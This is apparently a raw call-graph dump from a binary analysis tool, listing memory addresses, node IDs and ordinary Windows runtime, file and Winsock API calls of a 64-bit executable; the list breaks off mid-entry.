7ff7f8d1c9b0 125 API calls 29424 7ff7f8d3c3b0 238 API calls 29426 7ff7f8d339b0 free free 29427 7ff7f8d0b5b3 43 API calls 29433 7ff7f8d3b580 33 API calls 29435 7ff7f8d33580 237 API calls _cwprintf_s_l 29436 7ff7f8d03168 52 API calls 3 library calls 29441 7ff7f8d2eb90 isdigit isdigit isdigit strtol 29443 7ff7f8d48792 _c_exit GetModuleHandleW __scrt_is_managed_app 27706 7ff7f8d07d8c 27707 7ff7f8d07d8f malloc 27706->27707 27709 7ff7f8d07dbd 27707->27709 27710 7ff7f8d0b3c6 27707->27710 27734 7ff7f8d0da94 calloc 27709->27734 27711 7ff7f8d0b3cb free 27710->27711 27714 7ff7f8d0b219 free 27716 7ff7f8d0b22c 27714->27716 27720 7ff7f8d0b234 free 27714->27720 27715 7ff7f8d07e38 __acrt_iob_func _fileno 27733 7ff7f8d07de3 __scrt_fastfail 27715->27733 27749 7ff7f8d0dbbc free free free free 27716->27749 27717 7ff7f8d07e7e __acrt_iob_func 27719 7ff7f8d07e98 _strdup 27717->27719 27719->27733 27722 7ff7f8d0b277 27720->27722 27723 7ff7f8d0b27c free free free 27720->27723 27750 7ff7f8d0dbbc free free free free 27722->27750 27725 7ff7f8d0b2af 27723->27725 27726 7ff7f8d0b079 fclose 27726->27733 27727 7ff7f8d0b05d _fileno 27727->27733 27728 7ff7f8d0b0ae free 27728->27733 27729 7ff7f8d0b0c7 free free 27731 7ff7f8d0b0e9 _close 27729->27731 27729->27733 27730 7ff7f8d0fadc 17 API calls 27730->27733 27731->27733 27732 7ff7f8d0b213 27732->27714 27733->27714 27733->27715 27733->27717 27733->27726 27733->27727 27733->27728 27733->27729 27733->27730 27733->27732 27735 7ff7f8d0daea free 27734->27735 27736 7ff7f8d0dafb 27734->27736 27737 7ff7f8d0db99 27735->27737 27751 7ff7f8d0d7d0 23 API calls _cwprintf_s_l 27736->27751 27738 7ff7f8d48290 _cwprintf_s_l 8 API calls 27737->27738 27740 7ff7f8d07dd7 27738->27740 27740->27711 27740->27733 27742 7ff7f8d0db2d 27742->27737 27743 7ff7f8d0db89 27752 7ff7f8d0dbbc free free free free 27743->27752 27744 7ff7f8d0db27 27744->27742 27744->27743 27746 7ff7f8d0db72 27744->27746 27747 7ff7f8d0f868 __swprintf_l 17 API calls 27744->27747 27748 7ff7f8d0fadc 17 API calls 27746->27748 27747->27746 27748->27743 27751->27744 27753 7ff7f8d0a162 27894 7ff7f8d0c884 27753->27894 27756 7ff7f8d0a1c5 27757 7ff7f8d0a201 27756->27757 27783 7ff7f8d07eba __scrt_fastfail 27756->27783 27926 7ff7f8d0ca64 126 API calls 2 library calls 27756->27926 27760 7ff7f8d0a239 27757->27760 27761 7ff7f8d0cfc4 129 API calls 27757->27761 27757->27783 27758 7ff7f8d0cfc4 129 API calls 27758->27756 27762 7ff7f8d0a271 27760->27762 27763 7ff7f8d0cfc4 129 API calls 27760->27763 27760->27783 27761->27760 27762->27783 27902 7ff7f8d0cfc4 27762->27902 27763->27762 27765 7ff7f8d0b079 fclose 27765->27783 27766 7ff7f8d0b05d _fileno 27766->27783 27768 7ff7f8d0b0ae free 27768->27783 27769 7ff7f8d0cfc4 129 API calls 27770 7ff7f8d0a2d9 27769->27770 27774 7ff7f8d0cfc4 129 API calls 27770->27774 27770->27783 27771 7ff7f8d0b0c7 free free 27773 7ff7f8d0b0e9 _close 27771->27773 27771->27783 27772 7ff7f8d0fadc 17 API calls 27772->27783 27773->27783 27775 7ff7f8d0a30e 27774->27775 27778 7ff7f8d0cfc4 129 API calls 27775->27778 27775->27783 27776 7ff7f8d0b213 free 27779 7ff7f8d0b22c 27776->27779 27787 7ff7f8d0b234 free 27776->27787 27780 7ff7f8d0a33e 27778->27780 27952 7ff7f8d0dbbc free free free free 27779->27952 27780->27783 27784 7ff7f8d0a3a3 27780->27784 27788 7ff7f8d0cfc4 129 API calls 27780->27788 27782 7ff7f8d07e38 __acrt_iob_func _fileno 27782->27783 27783->27765 27783->27766 27783->27768 27783->27771 27783->27772 27783->27776 27783->27782 27785 7ff7f8d07e7e __acrt_iob_func 27783->27785 27784->27783 27786 7ff7f8d0cfc4 129 API calls 27784->27786 27789 7ff7f8d07e98 _strdup 27785->27789 27790 7ff7f8d0a3d6 27786->27790 27794 7ff7f8d0b277 27787->27794 27795 7ff7f8d0b27c free free free 27787->27795 27791 7ff7f8d0a372 27788->27791 27789->27783 27790->27783 27793 7ff7f8d0a409 27790->27793 27797 7ff7f8d0cfc4 129 API calls 27790->27797 27791->27783 27796 7ff7f8d0cfc4 129 API calls 27791->27796 27793->27783 27798 7ff7f8d0a467 27793->27798 27801 7ff7f8d0cfc4 129 API calls 27793->27801 27953 7ff7f8d0dbbc free free free free 27794->27953 27800 7ff7f8d0b2af 27795->27800 27796->27784 27797->27793 27798->27783 27802 7ff7f8d0cfc4 129 API calls 27798->27802 27803 7ff7f8d0a43c 27801->27803 27804 7ff7f8d0a49a 27802->27804 27803->27783 27805 7ff7f8d0cfc4 129 API calls 27803->27805 27804->27783 27806 7ff7f8d0a50d 27804->27806 27807 7ff7f8d0cfc4 129 API calls 27804->27807 27805->27798 27806->27783 27808 7ff7f8d0a541 27806->27808 27810 7ff7f8d0cfc4 129 API calls 27806->27810 27809 7ff7f8d0a4ce 27807->27809 27808->27783 27811 7ff7f8d0a579 27808->27811 27812 7ff7f8d0cfc4 129 API calls 27808->27812 27809->27783 27817 7ff7f8d0cfc4 129 API calls 27809->27817 27810->27808 27811->27783 27813 7ff7f8d0a5ac 27811->27813 27927 7ff7f8d0ce5c 130 API calls 27811->27927 27812->27811 27813->27783 27815 7ff7f8d0a5dc 27813->27815 27816 7ff7f8d0cfc4 129 API calls 27813->27816 27815->27783 27818 7ff7f8d0a60a 27815->27818 27928 7ff7f8d0c90c 126 API calls 2 library calls 27815->27928 27816->27815 27817->27806 27818->27783 27820 7ff7f8d0a638 27818->27820 27929 7ff7f8d0c90c 126 API calls 2 library calls 27818->27929 27820->27783 27822 7ff7f8d0cfc4 129 API calls 27820->27822 27823 7ff7f8d0a694 27822->27823 27823->27783 27824 7ff7f8d0cfc4 129 API calls 27823->27824 27825 7ff7f8d0a6c3 27824->27825 27825->27783 27826 7ff7f8d0a6f6 27825->27826 27930 7ff7f8d0ce5c 130 API calls 27825->27930 27826->27783 27827 7ff7f8d0a729 27826->27827 27931 7ff7f8d0ce5c 130 API calls 27826->27931 27827->27783 27830 7ff7f8d0a775 27827->27830 27833 7ff7f8d0cfc4 129 API calls 27827->27833 27855 7ff7f8d0a88d 27827->27855 27830->27783 27834 7ff7f8d0a7ad 27830->27834 27837 7ff7f8d0cfc4 129 API calls 27830->27837 27831 7ff7f8d0a8c2 27831->27783 27832 7ff7f8d0a910 27831->27832 27932 7ff7f8d0ca64 126 API calls 2 library calls 27831->27932 27832->27783 27838 7ff7f8d0cfc4 129 API calls 27832->27838 27843 7ff7f8d0a943 27832->27843 27833->27830 27834->27783 27839 7ff7f8d0cfc4 129 API calls 27834->27839 27847 7ff7f8d0a7e5 27834->27847 27835 7ff7f8d0cfc4 129 API calls 27835->27831 27837->27834 27838->27843 27839->27847 27840 7ff7f8d0cfc4 129 API calls 27842 7ff7f8d0a81d 27840->27842 27841 7ff7f8d0a855 27841->27783 27852 7ff7f8d0cfc4 129 API calls 27841->27852 27841->27855 27842->27783 27842->27841 27849 7ff7f8d0cfc4 129 API calls 27842->27849 27843->27783 27844 7ff7f8d0cfc4 129 API calls 27843->27844 27846 7ff7f8d0a97b 27843->27846 27844->27846 27845 7ff7f8d0a9ae 27845->27783 27848 7ff7f8d0a9e1 27845->27848 27851 7ff7f8d0cfc4 129 API calls 27845->27851 27846->27783 27846->27845 27850 7ff7f8d0cfc4 129 API calls 27846->27850 27847->27783 27847->27840 27847->27842 27848->27783 27853 7ff7f8d0cfc4 129 API calls 27848->27853 27859 7ff7f8d0aa14 27848->27859 27849->27841 27850->27845 27851->27848 27852->27855 27853->27859 27854 7ff7f8d0aa65 27854->27783 27856 7ff7f8d0aa9a 27854->27856 27857 7ff7f8d0cfc4 129 API calls 27854->27857 27855->27783 27855->27831 27855->27835 27856->27783 27858 7ff7f8d0aae3 27856->27858 27860 7ff7f8d0cfc4 129 API calls 27856->27860 27857->27856 27858->27783 27861 7ff7f8d0ab16 27858->27861 27863 7ff7f8d0cfc4 129 API calls 27858->27863 27859->27783 27859->27854 27862 7ff7f8d0cfc4 129 API calls 27859->27862 27860->27858 27861->27783 27925 7ff7f8d0e0ac GetTickCount64 27861->27925 27862->27854 27863->27861 27865 7ff7f8d0ab45 27880 7ff7f8d0ab5a 27865->27880 27933 7ff7f8d02d10 11 API calls 27865->27933 27867 7ff7f8d0ae48 27868 7ff7f8d0af58 27867->27868 27884 7ff7f8d0aeaa 27867->27884 27949 7ff7f8d0feb4 22 API calls 27867->27949 27869 7ff7f8d0af7d 27868->27869 27872 7ff7f8d0af69 fputs 27868->27872 27869->27783 27951 7ff7f8d0e0f8 29 API calls 2 library calls 27869->27951 27872->27869 27876 7ff7f8d0feb4 22 API calls 27876->27880 27878 7ff7f8d0fadc 17 API calls 27883 7ff7f8d0aee9 27878->27883 27879 7ff7f8d0ad63 Sleep 27886 7ff7f8d0ac3e 27879->27886 27880->27783 27880->27867 27880->27876 27880->27883 27880->27886 27934 7ff7f8d01bd0 27880->27934 27946 7ff7f8d0fa98 18 API calls __swprintf_l 27880->27946 27947 7ff7f8d0e0ac GetTickCount64 27880->27947 27881 7ff7f8d0ae73 27881->27883 27950 7ff7f8d0feb4 22 API calls 27881->27950 27883->27868 27885 7ff7f8d0fadc 17 API calls 27883->27885 27884->27878 27884->27883 27885->27868 27886->27880 27887 7ff7f8d0adc6 fflush _fileno _lseeki64 27886->27887 27888 7ff7f8d0fadc 17 API calls 27886->27888 27948 7ff7f8d07774 22 API calls 27886->27948 27889 7ff7f8d0ae20 27887->27889 27890 7ff7f8d0adf1 _get_osfhandle SetEndOfFile 27887->27890 27888->27886 27892 7ff7f8d0ae39 27889->27892 27893 7ff7f8d0fadc 17 API calls 27889->27893 27890->27889 27891 7ff7f8d0ae07 fseek 27890->27891 27891->27880 27892->27783 27893->27892 27954 7ff7f8d0fc24 27894->27954 27897 7ff7f8d0c8df 27958 7ff7f8d02cbc 28 API calls _cwprintf_s_l 27897->27958 27898 7ff7f8d0c8f0 27959 7ff7f8d02cbc 28 API calls _cwprintf_s_l 27898->27959 27901 7ff7f8d0a190 27901->27756 27901->27758 27901->27783 27903 7ff7f8d0d0a5 27902->27903 27909 7ff7f8d0d01b 27902->27909 27904 7ff7f8d0d10f 27903->27904 27912 7ff7f8d0d0ad 27903->27912 27905 7ff7f8d0f868 __swprintf_l 17 API calls 27904->27905 27907 7ff7f8d0d12b 27905->27907 27906 7ff7f8d0f868 __swprintf_l 17 API calls 27908 7ff7f8d0d081 27906->27908 27910 7ff7f8d0fc24 119 API calls 27907->27910 27911 7ff7f8d0fc24 119 API calls 27908->27911 27909->27906 27916 7ff7f8d0d098 27910->27916 27911->27916 27913 7ff7f8d0fc24 119 API calls 27912->27913 27913->27916 27914 7ff7f8d0d1c4 free 27915 7ff7f8d48290 _cwprintf_s_l 8 API calls 27914->27915 27917 7ff7f8d0a2a4 27915->27917 27916->27914 27918 7ff7f8d0d16c 27916->27918 27919 7ff7f8d0d181 27916->27919 27917->27769 27917->27783 28082 7ff7f8d02cbc 28 API calls _cwprintf_s_l 27918->28082 28081 7ff7f8d0c748 19 API calls __swprintf_l 27919->28081 27922 7ff7f8d0d189 27922->27918 27924 7ff7f8d0d191 27922->27924 27923 7ff7f8d0d1c2 27923->27914 27924->27914 27925->27865 27926->27757 27927->27813 27928->27818 27929->27820 27930->27826 27931->27827 27932->27832 27933->27880 27935 7ff7f8d01c84 27934->27935 27936 7ff7f8d01bf4 27934->27936 28084 7ff7f8d07774 22 API calls 27935->28084 27936->27935 27937 7ff7f8d01bfd 27936->27937 27939 7ff7f8d01c03 fopen 27937->27939 27940 7ff7f8d01c40 fopen 27937->27940 27939->27940 27942 7ff7f8d01c15 fclose strerror 27939->27942 27941 7ff7f8d01c3e 27940->27941 27943 7ff7f8d01c55 _errno strerror 27940->27943 27941->27880 27944 7ff7f8d01c30 27942->27944 27943->27944 28083 7ff7f8d07774 22 API calls 27944->28083 27946->27880 27947->27880 27948->27879 27949->27881 27950->27884 27951->27783 27955 7ff7f8d0c8a8 27954->27955 27956 7ff7f8d0fc40 27954->27956 27955->27897 27955->27898 27955->27901 27960 7ff7f8d1a1f0 27956->27960 27958->27901 27959->27901 27961 7ff7f8d1aff3 27960->27961 27962 7ff7f8d1a225 27960->27962 27965 7ff7f8d1b3ee 27961->27965 27966 7ff7f8d1b013 27961->27966 27975 7ff7f8d1a256 27961->27975 27963 7ff7f8d1a978 27962->27963 27964 7ff7f8d1a238 27962->27964 27962->27975 27967 7ff7f8d1af2d 27963->27967 27963->27975 27987 7ff7f8d1a58e 27963->27987 27969 7ff7f8d1a247 27964->27969 27970 7ff7f8d1a576 27964->27970 27964->27975 27968 7ff7f8d1b3fb 27965->27968 27981 7ff7f8d1b845 27965->27981 27973 7ff7f8d1b279 27966->27973 27974 7ff7f8d1b026 27966->27974 27966->27975 27971 7ff7f8d1af90 27967->27971 27972 7ff7f8d1af35 27967->27972 27968->27975 27978 7ff7f8d1b40e 27968->27978 27996 7ff7f8d1b5de _cwprintf_s_l 27968->27996 27969->27975 28019 7ff7f8d1a4ed free 27969->28019 27970->27975 27985 7ff7f8d1a687 27970->27985 27970->27987 27976 7ff7f8d1afc0 27971->27976 27990 7ff7f8d1afa9 free 27971->27990 27982 7ff7f8d1af59 27972->27982 27988 7ff7f8d1af44 27972->27988 27977 7ff7f8d1b325 27973->27977 28003 7ff7f8d1b286 27973->28003 27979 7ff7f8d1b02c 27974->27979 27980 7ff7f8d1b251 27974->27980 27975->27955 28047 7ff7f8d19a30 free 27976->28047 27977->27988 27991 7ff7f8d1b380 27977->27991 27978->27975 28056 7ff7f8d229ac 10 API calls 27978->28056 27986 7ff7f8d1b039 27979->27986 28002 7ff7f8d1b170 27979->28002 27980->27975 27983 7ff7f8d1b264 __acrt_iob_func 27980->27983 27981->27975 27989 7ff7f8d1b952 27981->27989 27994 7ff7f8d1b8d5 27981->27994 28046 7ff7f8d19a9c 10 API calls 27982->28046 27983->27975 27985->27975 28021 7ff7f8d1a704 realloc 27985->28021 27986->27975 27999 7ff7f8d1b112 free 27986->27999 28000 7ff7f8d1b054 27986->28000 27987->27975 28045 7ff7f8d167ac 23 API calls 2 library calls 27987->28045 27988->27975 28053 7ff7f8d19a30 free 27988->28053 28076 7ff7f8d19a30 free 27989->28076 27990->27976 28054 7ff7f8d19a30 free 27991->28054 27994->27975 27998 7ff7f8d1b8da free 27994->27998 27996->27975 28020 7ff7f8d1b649 27996->28020 28032 7ff7f8d1b686 _cwprintf_s_l 27996->28032 28017 7ff7f8d1b91d malloc 27998->28017 27999->27975 28005 7ff7f8d1b059 28000->28005 28006 7ff7f8d1b0be 28000->28006 28002->27975 28002->27988 28024 7ff7f8d1b1b5 28002->28024 28003->27975 28003->27988 28007 7ff7f8d1b2cf 28003->28007 28004 7ff7f8d1b38f 28055 7ff7f8d22324 88 API calls 28004->28055 28005->27988 28010 7ff7f8d1b098 28005->28010 28011 7ff7f8d1b0ee 28006->28011 28018 7ff7f8d1b0d7 free 28006->28018 28052 7ff7f8d19a30 free 28007->28052 28048 7ff7f8d19a30 free 28010->28048 28049 7ff7f8d19a30 free 28011->28049 28014 7ff7f8d1b3a9 _cwprintf_s_l 28014->27975 28017->27975 28017->28014 28018->28011 28019->27975 28028 7ff7f8d1b67e _cwprintf_s_l 28020->28028 28057 7ff7f8d2127c 8 API calls 28020->28057 28021->27975 28023 7ff7f8d1b1ed 28023->27975 28051 7ff7f8d0e668 free free 28023->28051 28024->27975 28024->28023 28050 7ff7f8d0e620 malloc free 28024->28050 28029 7ff7f8d1b718 28028->28029 28030 7ff7f8d1b727 _cwprintf_s_l 28028->28030 28059 7ff7f8d22c00 28029->28059 28033 7ff7f8d1b747 28030->28033 28034 7ff7f8d1b73a 28030->28034 28032->28028 28058 7ff7f8d2127c 8 API calls 28032->28058 28036 7ff7f8d1b755 28033->28036 28040 7ff7f8d1b76c 28033->28040 28073 7ff7f8d215a8 90 API calls 28034->28073 28074 7ff7f8d22324 88 API calls 28036->28074 28039 7ff7f8d1b7ef free 28039->27975 28040->28039 28042 7ff7f8d1b765 28040->28042 28042->28040 28075 7ff7f8d2175c 78 API calls 2 library calls 28042->28075 28044 7ff7f8d1b7e0 28044->28039 28045->27975 28046->27975 28047->27975 28048->27975 28049->27975 28050->28023 28051->27975 28052->27975 28053->27975 28054->28004 28055->28014 28056->27975 28060 7ff7f8d22c19 28059->28060 28061 7ff7f8d22c64 28059->28061 28062 7ff7f8d22c28 28060->28062 28063 7ff7f8d22c23 28060->28063 28066 7ff7f8d22c79 28061->28066 28079 7ff7f8d0e668 free free 28061->28079 28078 7ff7f8d22ae0 33 API calls 28062->28078 28077 7ff7f8d215a8 90 API calls 28063->28077 28071 7ff7f8d22cb7 28066->28071 28080 7ff7f8d229ac 10 API calls 28066->28080 28068 7ff7f8d22c48 28068->28066 28070 7ff7f8d16714 19 API calls 28068->28070 28072 7ff7f8d22c62 28070->28072 28071->27975 28072->28066 28073->27975 28074->28042 28075->28044 28076->27975 28077->28062 28078->28068 28079->28066 28080->28071 28081->27922 28082->27923 28083->27941 28084->27941 29447 7ff7f8d0bb64 _errno strtol _errno 29448 7ff7f8d48560 11 API calls 4 library calls 28213 7ff7f8d07384 28236 7ff7f8d0fb08 28213->28236 28216 7ff7f8d07475 __acrt_iob_func 28219 7ff7f8d07484 28216->28219 28217 7ff7f8d07393 28255 7ff7f8d07100 28217->28255 28298 7ff7f8d077b0 18 API calls __swprintf_l 28219->28298 28220 7ff7f8d07398 28222 7ff7f8d07464 __acrt_iob_func 28220->28222 28223 7ff7f8d073a2 28220->28223 28222->28219 28225 7ff7f8d0fb08 40 API calls 28223->28225 28229 7ff7f8d073af 28223->28229 28224 7ff7f8d0748c free 28232 7ff7f8d073f8 __scrt_fastfail 28224->28232 28225->28229 28226 7ff7f8d074d1 28230 7ff7f8d073b3 28229->28230 28259 7ff7f8d1a0a0 calloc 28229->28259 28231 7ff7f8d073b8 __acrt_iob_func 28230->28231 28297 7ff7f8d077b0 18 API calls __swprintf_l 28231->28297 28232->28226 28276 7ff7f8d071c0 28232->28276 28235 7ff7f8d073cf free 28235->28226 28237 7ff7f8d0fb3c calloc 28236->28237 28242 7ff7f8d0fb35 28236->28242 28238 7ff7f8d0fb9b WSAStartup 28237->28238 28239 7ff7f8d0fb8b 28237->28239 28241 7ff7f8d0fbaf 28238->28241 28238->28242 28299 7ff7f8d164d4 28239->28299 28245 7ff7f8d0fbcb WSACleanup 28241->28245 28248 7ff7f8d0fbc0 28241->28248 28243 7ff7f8d48290 _cwprintf_s_l 8 API calls 28242->28243 28246 7ff7f8d07389 28243->28246 28247 7ff7f8d0fbc5 28245->28247 28246->28216 28246->28217 28247->28242 28307 7ff7f8d24758 28247->28307 28249 7ff7f8d164d4 26 API calls 28248->28249 28249->28247 28253 7ff7f8d0fbee 28253->28242 28312 7ff7f8d12350 17 API calls __swprintf_l 28253->28312 28256 7ff7f8d07179 28255->28256 28258 7ff7f8d0711d _cwprintf_s_l 28255->28258 28338 7ff7f8d12350 17 API calls __swprintf_l 28256->28338 28258->28220 28260 7ff7f8d1a0c8 calloc 28259->28260 28261 7ff7f8d073e7 28260->28261 28262 7ff7f8d1a0e4 malloc 28260->28262 28261->28230 28261->28231 28261->28232 28264 7ff7f8d1a11c malloc 28262->28264 28265 7ff7f8d1a134 28264->28265 28270 7ff7f8d1a12f 28264->28270 28339 7ff7f8d19eb0 __acrt_iob_func __acrt_iob_func __acrt_iob_func 28265->28339 28267 7ff7f8d1a140 28340 7ff7f8d22cd0 free free free free free 28267->28340 28268 7ff7f8d1a193 free 28272 7ff7f8d1a1ac free 28268->28272 28270->28268 28271 7ff7f8d1a1d4 28270->28271 28271->28261 28341 7ff7f8d19964 28272->28341 28277 7ff7f8d071e1 28276->28277 28280 7ff7f8d071e6 28276->28280 28349 7ff7f8d19b98 28277->28349 28279 7ff7f8d07290 free 28281 7ff7f8d072a4 28279->28281 28282 7ff7f8d072b3 28279->28282 28280->28279 28285 7ff7f8d0721a 28280->28285 28393 7ff7f8d29424 free 28280->28393 28281->28282 28283 7ff7f8d072ad fclose 28281->28283 28284 7ff7f8d072cc free 28282->28284 28286 7ff7f8d072c6 fclose 28282->28286 28283->28282 28288 7ff7f8d07307 28284->28288 28289 7ff7f8d072e7 28284->28289 28290 7ff7f8d07259 28285->28290 28296 7ff7f8d0723f FreeLibrary 28285->28296 28286->28284 28288->28226 28394 7ff7f8d01dc0 74 API calls 28289->28394 28291 7ff7f8d07264 WSACleanup 28290->28291 28292 7ff7f8d0728a 28290->28292 28291->28292 28294 7ff7f8d07276 FreeLibrary 28291->28294 28292->28279 28294->28292 28295 7ff7f8d072f6 free 28295->28288 28295->28289 28296->28290 28297->28235 28298->28224 28300 7ff7f8d164e4 28299->28300 28306 7ff7f8d0fb97 28299->28306 28313 7ff7f8d2df38 28300->28313 28305 7ff7f8d1651c GetProcAddress 28305->28306 28306->28238 28306->28242 28308 7ff7f8d24767 socket 28307->28308 28309 7ff7f8d0fbdf 28307->28309 28308->28309 28310 7ff7f8d24786 closesocket 28308->28310 28311 7ff7f8d122a4 17 API calls __swprintf_l 28309->28311 28310->28309 28311->28253 28312->28242 28314 7ff7f8d2df6d __scrt_fastfail 28313->28314 28315 7ff7f8d2dfb6 6 API calls 28314->28315 28316 7ff7f8d2df81 28314->28316 28315->28316 28317 7ff7f8d48290 _cwprintf_s_l 8 API calls 28316->28317 28318 7ff7f8d164f2 28317->28318 28319 7ff7f8d2e068 GetModuleHandleA 28318->28319 28320 7ff7f8d16509 28319->28320 28321 7ff7f8d2e0a3 GetProcAddress _mbspbrk 28319->28321 28320->28305 28320->28306 28322 7ff7f8d2e0cb 28321->28322 28323 7ff7f8d2e0ec 28321->28323 28326 7ff7f8d2e0e1 LoadLibraryA 28322->28326 28328 7ff7f8d2e0d0 28322->28328 28324 7ff7f8d2e0f1 GetProcAddress 28323->28324 28325 7ff7f8d2e124 GetSystemDirectoryA 28323->28325 28324->28325 28330 7ff7f8d2e106 28324->28330 28325->28320 28327 7ff7f8d2e139 28325->28327 28326->28320 28327->28327 28331 7ff7f8d2e149 malloc 28327->28331 28329 7ff7f8d2e115 LoadLibraryExA 28328->28329 28329->28320 28330->28329 28333 7ff7f8d2e16c GetSystemDirectoryA 28331->28333 28337 7ff7f8d2e1b6 free 28331->28337 28335 7ff7f8d2e17c 28333->28335 28333->28337 28336 7ff7f8d2e1cc LoadLibraryA 28335->28336 28335->28337 28336->28337 28337->28320 28338->28258 28339->28267 28340->28270 28342 7ff7f8d19987 free 28341->28342 28344 7ff7f8d199aa 28342->28344 28345 7ff7f8d199da 28344->28345 28347 7ff7f8d199c3 free 28344->28347 28346 7ff7f8d19a13 free 28345->28346 28348 7ff7f8d199fb free 28345->28348 28346->28271 28347->28345 28348->28346 28350 7ff7f8d19e97 28349->28350 28351 7ff7f8d19bba 28349->28351 28350->28280 28352 7ff7f8d163c4 19 API calls 28351->28352 28353 7ff7f8d19bbf 28352->28353 28354 7ff7f8d19bd3 28353->28354 28408 7ff7f8d13c78 138 API calls 28353->28408 28358 7ff7f8d19be4 28354->28358 28409 7ff7f8d1577c 237 API calls 28354->28409 28357 7ff7f8d19c1a free 28361 7ff7f8d1e2dc 2 API calls 28357->28361 28358->28357 28359 7ff7f8d19c11 free 28358->28359 28359->28357 28363 7ff7f8d19c49 28361->28363 28362 7ff7f8d19cb1 free 28368 7ff7f8d19ce1 free 28362->28368 28363->28362 28365 7ff7f8d19c91 free 28363->28365 28410 7ff7f8d2429c 9 API calls 28363->28410 28365->28362 28395 7ff7f8d245cc 28368->28395 28372 7ff7f8d19d49 28374 7ff7f8d19d80 free 28372->28374 28376 7ff7f8d19d69 free 28372->28376 28373 7ff7f8d19d22 free 28373->28372 28378 7ff7f8d19db7 free 28374->28378 28376->28374 28379 7ff7f8d22c00 97 API calls 28378->28379 28380 7ff7f8d19dd4 28379->28380 28401 7ff7f8d41538 28380->28401 28382 7ff7f8d19de0 28383 7ff7f8d41538 4 API calls 28382->28383 28384 7ff7f8d19dec free 28383->28384 28386 7ff7f8d19e1c free 28384->28386 28387 7ff7f8d19e35 28386->28387 28388 7ff7f8d19e7a 28387->28388 28411 7ff7f8d2dea8 free free 28387->28411 28390 7ff7f8d19964 3 API calls 28388->28390 28391 7ff7f8d19e82 free 28390->28391 28391->28350 28393->28285 28394->28295 28396 7ff7f8d245e8 28395->28396 28397 7ff7f8d19cf9 free 28395->28397 28398 7ff7f8d2461a free 28396->28398 28412 7ff7f8d0e668 free free 28396->28412 28397->28372 28397->28373 28398->28397 28402 7ff7f8d4155a free 28401->28402 28403 7ff7f8d41571 free 28402->28403 28404 7ff7f8d415a5 free 28402->28404 28403->28404 28406 7ff7f8d415d0 free 28404->28406 28406->28382 28408->28354 28409->28358 28410->28363 28411->28388 28412->28396 29450 7ff7f8d07d82 63 API calls __scrt_fastfail 29451 7ff7f8d0b96c 11 API calls 2 library calls 29454 7ff7f8d38970 416 API calls 29455 7ff7f8d32970 97 API calls _cwprintf_s_l 29457 7ff7f8d2fb70 149 API calls 29458 7ff7f8d32570 25 API calls 29459 7ff7f8d03734 10 API calls 27705 7ff7f8d07d2d 38 API calls __scrt_fastfail 29463 7ff7f8d3f140 138 API calls _cwprintf_s_l 29464 7ff7f8d38340 69 API calls _cwprintf_s_l 29465 7ff7f8d07e38 67 API calls __scrt_fastfail 28643 7ff7f8d14556 28644 7ff7f8d155ab 28643->28644 28645 7ff7f8d14566 28643->28645 28809 7ff7f8d167ac 23 API calls 2 library calls 28644->28809 28647 7ff7f8d1645c 20 API calls 28645->28647 28649 7ff7f8d1457f 28645->28649 28647->28649 28648 7ff7f8d1530c 28650 7ff7f8d173c8 9 API calls 28649->28650 28651 7ff7f8d1473b 28649->28651 28652 7ff7f8d145bf 28650->28652 28656 7ff7f8d14767 28651->28656 28657 7ff7f8d14b6c 28651->28657 28658 7ff7f8d14c82 28651->28658 28704 7ff7f8d14736 28651->28704 28717 7ff7f8d14c49 28651->28717 28652->28651 28654 7ff7f8d145c8 28652->28654 28655 7ff7f8d145f0 28654->28655 28660 7ff7f8d1465e 28654->28660 28776 7ff7f8d167ac 23 API calls 2 library calls 28655->28776 28663 7ff7f8d149df 28656->28663 28664 7ff7f8d14770 28656->28664 28662 7ff7f8d28674 GetTickCount64 28657->28662 28685 7ff7f8d14ccf 28658->28685 28768 7ff7f8d143b4 28658->28768 28668 7ff7f8d146bc 28660->28668 28669 7ff7f8d14672 28660->28669 28661 7ff7f8d14d08 28665 7ff7f8d14df2 28661->28665 28673 7ff7f8d14d58 28661->28673 28667 7ff7f8d14b79 28662->28667 28781 7ff7f8d191d8 23 API calls _cwprintf_s_l 28663->28781 28670 7ff7f8d14779 28664->28670 28671 7ff7f8d14964 28664->28671 28686 7ff7f8d139c4 131 API calls 28665->28686 28665->28704 28761 7ff7f8d20fd8 28667->28761 28778 7ff7f8d167ac 23 API calls 2 library calls 28668->28778 28777 7ff7f8d167ac 23 API calls 2 library calls 28669->28777 28676 7ff7f8d148da 28670->28676 28677 7ff7f8d14782 28670->28677 28727 7ff7f8d17d68 28671->28727 28672 7ff7f8d14c5b 28681 7ff7f8d28674 GetTickCount64 28672->28681 28672->28704 28807 7ff7f8d268c0 24 API calls 28673->28807 28780 7ff7f8d2ab30 270 API calls 28676->28780 28683 7ff7f8d1488b 28677->28683 28696 7ff7f8d1478b 28677->28696 28680 7ff7f8d1645c 20 API calls 28700 7ff7f8d152bb 28680->28700 28687 7ff7f8d14c7d 28681->28687 28779 7ff7f8d1d504 270 API calls 28683->28779 28685->28661 28691 7ff7f8d139c4 131 API calls 28685->28691 28686->28704 28687->28658 28688 7ff7f8d14d68 28701 7ff7f8d139c4 131 API calls 28688->28701 28690 7ff7f8d148e6 28698 7ff7f8d139c4 131 API calls 28690->28698 28690->28704 28691->28661 28693 7ff7f8d14897 28693->28704 28707 7ff7f8d139c4 131 API calls 28693->28707 28694 7ff7f8d14a3b 28702 7ff7f8d14a6c 28694->28702 28703 7ff7f8d14a95 28694->28703 28782 7ff7f8d2e5b8 28694->28782 28695 7ff7f8d139c4 131 API calls 28695->28704 28696->28704 28705 7ff7f8d139c4 131 API calls 28696->28705 28697 7ff7f8d14b8c 28697->28704 28712 7ff7f8d16208 20 API calls 28697->28712 28718 7ff7f8d14bfd 28697->28718 28698->28704 28699 7ff7f8d14659 28699->28695 28700->28648 28715 7ff7f8d1c3a4 125 API calls 28700->28715 28706 7ff7f8d14d91 28701->28706 28709 7ff7f8d16714 19 API calls 28702->28709 28783 7ff7f8d23a4c 49 API calls _cwprintf_s_l 28703->28783 28704->28648 28704->28680 28705->28704 28711 7ff7f8d14d9e free 28706->28711 28714 7ff7f8d14da3 28706->28714 28707->28704 28713 7ff7f8d14a93 28709->28713 28711->28704 28712->28718 28784 7ff7f8d158c8 13 API calls _cwprintf_s_l 28713->28784 28808 7ff7f8d265d8 31 API calls _cwprintf_s_l 28714->28808 28715->28648 28806 7ff7f8d25f60 128 API calls 28717->28806 28718->28704 28718->28717 28720 7ff7f8d14db6 28720->28711 28722 7ff7f8d14ab4 28726 7ff7f8d14af0 28722->28726 28785 7ff7f8d20e8c 28722->28785 28725 7ff7f8d1c3a4 125 API calls 28725->28726 28726->28704 28728 